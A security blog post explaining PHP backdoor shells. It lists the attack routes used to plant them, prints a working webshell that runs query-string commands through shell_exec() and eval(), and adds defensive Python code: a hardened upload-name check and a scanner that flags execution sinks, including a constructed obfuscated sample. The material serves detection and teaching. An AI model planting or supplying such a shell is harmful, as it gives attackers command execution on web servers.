Thursday, 17 May 2012

Checking Out Backdoor Shells

A backdoor shell is a piece of PHP, ASP, JSP or similar code uploaded to a site so that the attacker can gain or retain access, with some privileges, on the web server. Once uploaded, it lets the attacker execute commands through functions such as shell_exec(), upload, delete, modify and download files on the web server, and much more. For defacers, it makes it easy to navigate to the public_html or /var/www directory and modify the index page.
There are several ways of attacking a web application in order to plant a backdoor shell. Some cases are listed below:
  1. Local File Inclusion – a web vulnerability that allows an attacker to inject directory traversal characters into a file-path parameter; combined with tampered request data (for example a PHP payload placed in the User-Agent header with a Firefox add-on such as User Agent Switcher, so that it ends up in a log file the vulnerable page can include), it can be used to spawn a shell.
  2. Remote Code Execution or Command Injection – possible if a website accepts user-supplied strings or arguments and passes them unchecked to a command that is executed on the hosting server.
  3. Structured Query Language Injection or SQLi – after the attacker obtains the website administrator's username and password, he or she can log in to the admin panel and possibly upload a backdoor shell, for example using null-byte injection on the image upload page.
  4. Sniffing
  5. Brute-force attacks – if none of the above is possible, attackers may brute-force the File Transfer Protocol or SSH logins to get into the web server.
  6. Cross-Site Scripting – if the attacker can make a victim's browser send requests and read the responses on the attacker's behalf, it is possible to backdoor a page.
  7. Social Engineering
  8. Remote File Inclusion
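The null-byte trick mentioned under SQLi above deserves a concrete look, because it shows why a suffix-only check on the client's filename is worthless. The following Python snippet is an added example, not code from the original article or from infosecinstitute: it contrasts a naive extension check with a hardened one, and emulates in Python what PHP before 5.3.4 did when a filename containing a NUL byte reached its C-backed file functions (the name was truncated at the NUL). The allowed-extension set and the function names are assumptions chosen for the illustration.

```python
import secrets
from typing import Optional

# Extensions the hypothetical image upload page is meant to accept (assumption).
ALLOWED_IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def naive_allows(filename: str) -> bool:
    """The weak check: trust the client-supplied name and look only at its suffix."""
    return filename.lower().endswith((".jpg", ".jpeg", ".png", ".gif"))


def name_as_seen_by_c_api(filename: str) -> str:
    """Emulates PHP before 5.3.4, whose file functions handed the name to C
    string APIs that stop at the first NUL byte: 'shell.php\\x00.jpg' is
    written to disk as 'shell.php'."""
    return filename.split("\x00", 1)[0]


def hardened_name(filename: str) -> Optional[str]:
    """Reject NUL bytes and path separators, whitelist the extension, and never
    reuse the client's basename. Returns None when the upload must be refused."""
    if not filename or "\x00" in filename or "/" in filename or "\\" in filename:
        return None
    if "." not in filename:
        return None
    ext = filename.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_IMAGE_EXTENSIONS:
        return None
    # Server-chosen random basename: the attacker no longer controls where the
    # bytes land or what the web server will treat the file as.
    return f"{secrets.token_hex(16)}.{ext}"


def demo() -> dict:
    """Runs the attacker's classic upload name through both checks."""
    attacker_name = "shell.php\x00.jpg"  # constructed malicious filename
    return {
        "naive_accepts": naive_allows(attacker_name),
        "stored_as": name_as_seen_by_c_api(attacker_name),
        "hardened_accepts": hardened_name(attacker_name) is not None,
    }


if __name__ == "__main__":
    print(demo())
```

Renaming the file is not a substitute for validating its content (checking the image's magic bytes and re-encoding it), and the upload directory should in any case be served without script execution; the point here is only that a filename the attacker wrote must never decide where a file is stored or how it is executed.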

In this write-up we focus on PHP backdoor shells, since most websites are written in PHP. Below is a simple piece of PHP code that is very popular and scattered all over the web (http://stackoverflow.com/questions/3115559/exploitable-php-functions; http://shipcodex.blogspot.com/2012/01/simple-php-backdoor-shell.html).
This code lets an attacker execute *nix commands (command execution/injection), evaluate arbitrary PHP, and echo arbitrary text into the page:

    <?php
    // Deliberately malicious sample as printed on the page: every branch feeds
    // attacker-controlled query-string input straight into a dangerous function.
    // ?shell=<cmd> runs the command; the trailing " &" backgrounds it on *nix.
    // (The <pre> tags around the output were stripped by page extraction and are restored here.)
    if(isset($_GET['shell'])) echo("<pre>".shell_exec($_GET['shell']." &")."</pre>");
    // ?php=<code> evaluates arbitrary PHP after undoing C-style escapes.
    if(isset($_GET['php'])) echo(eval(stripcslashes($_GET['php'])));
    // ?echo=<text> reflects arbitrary text into the response.
    if(isset($_GET['echo'])) echo($_GET['echo']);
    ?>
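Since the title of this post is about checking for backdoor shells, here is what the defensive side of the snippet above looks like: a small static scanner that flags PHP files where request input ($_GET, $_POST, $_REQUEST, $_COOKIE, $_FILES) reaches a code- or command-execution sink, including two cheap evasions (a function name hidden in a base64 literal, and a variable function call such as `$f(...)`). This is an added example written for this page, not code from the original article or from infosecinstitute; the three sample files are constructed inline (the first reproduces the backdoor above, the second is a harmless contact form, the third is an obfuscated variant), and the sink and source lists are assumptions, not an exhaustive catalogue.

```python
import base64
import re
from typing import Dict, List

# Constructed sample files (not taken from any real server).
SAMPLES: Dict[str, str] = {
    "simple_backdoor.php": (
        "<?php\n"
        "if(isset($_GET['shell'])) echo(\"<pre>\".shell_exec($_GET['shell'].\" &\").\"</pre>\");\n"
        "if(isset($_GET['php'])) echo(eval(stripcslashes($_GET['php'])));\n"
        "if(isset($_GET['echo'])) echo($_GET['echo']);\n"
    ),
    "contact.php": (
        "<?php\n"
        "$name = htmlspecialchars($_POST['name'] ?? '');\n"
        "mail('admin@example.com', 'Contact form', $name);\n"
    ),
    "obfuscated.php": (
        "<?php\n"
        "$f = base64_decode('c3lzdGVt');\n"  # the literal decodes to 'system'
        "$f($_REQUEST['c']);\n"
    ),
}

# Functions that execute code or commands (assumed list), and the superglobals
# that carry attacker-controlled request data.
SINKS = ("shell_exec", "exec", "system", "passthru", "popen", "proc_open",
         "eval", "assert", "create_function")
SOURCES = ("GET", "POST", "REQUEST", "COOKIE", "FILES")

_SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(")
_SOURCE_RE = re.compile(r"\$_(" + "|".join(SOURCES) + r")\b")
_DYNCALL_RE = re.compile(r"\$\w+\s*\(")  # $f(...): callee decided at runtime
_B64_RE = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")


def scan_php(source: str) -> List[str]:
    """Return the findings for one PHP file. Statements are split on ';', which
    is crude but enough for the one-line webshells this page discusses."""
    findings: List[str] = []
    for stmt in source.split(";"):
        stmt = stmt.strip()
        if not stmt:
            continue
        sink = _SINK_RE.search(stmt)
        request_input = _SOURCE_RE.search(stmt)
        if sink and request_input:
            findings.append(f"{sink.group(1)}() called with request input {request_input.group(0)}")
        elif request_input and _DYNCALL_RE.search(stmt):
            findings.append(f"variable function call receives request input {request_input.group(0)}")
        # Sink names hidden in base64 literals, a common way to dodge a plain grep.
        for m in _B64_RE.finditer(stmt):
            try:
                decoded = base64.b64decode(m.group(1), validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue
            if decoded in SINKS:
                findings.append(f"base64-hidden call to {decoded}()")
    return findings


def suspicious_files(files: Dict[str, str]) -> List[str]:
    """Sorted names of the files that produced at least one finding."""
    return sorted(name for name, src in files.items() if scan_php(src))


if __name__ == "__main__":
    for name, src in SAMPLES.items():
        for finding in scan_php(src):
            print(f"{name}: {finding}")
```

A regex pass like this is a triage tool, not a proof of absence: it will miss shells that assemble the function name from string fragments or load the payload from a second file, so on a compromised host it should be paired with file-integrity checks against a known-good copy of the site and with web-server logs showing which scripts received `?shell=`-style parameters.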


Source: resources.infosecinstitute.com/

